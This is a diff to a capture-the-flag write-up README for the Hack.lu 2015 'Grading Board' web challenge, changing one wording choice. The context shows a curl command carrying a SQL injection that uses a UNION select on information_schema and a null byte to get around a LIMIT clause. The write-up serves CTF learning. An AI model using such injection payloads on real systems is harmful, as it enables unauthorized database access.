hyijhen/writeup/Hack.lu CTF 2015/Grading Board [web] 300/README.md

 <br>
 Note:<br>
-It's also able to bypass the limit of "LIMIT 5" by using null byte.
+It's also possible to bypass the limit of "LIMIT 5" by using null byte.
 We can modify our input as following and use curl to send our post request:
 <pre><code>
 curl -X POST --data "name=AND 1=1e0union select table_schema, table_name, column_name FROM information_schema.columns;%00\&site=default&action=search" https://school.fluxfingers.net:1506/
 </code></pre>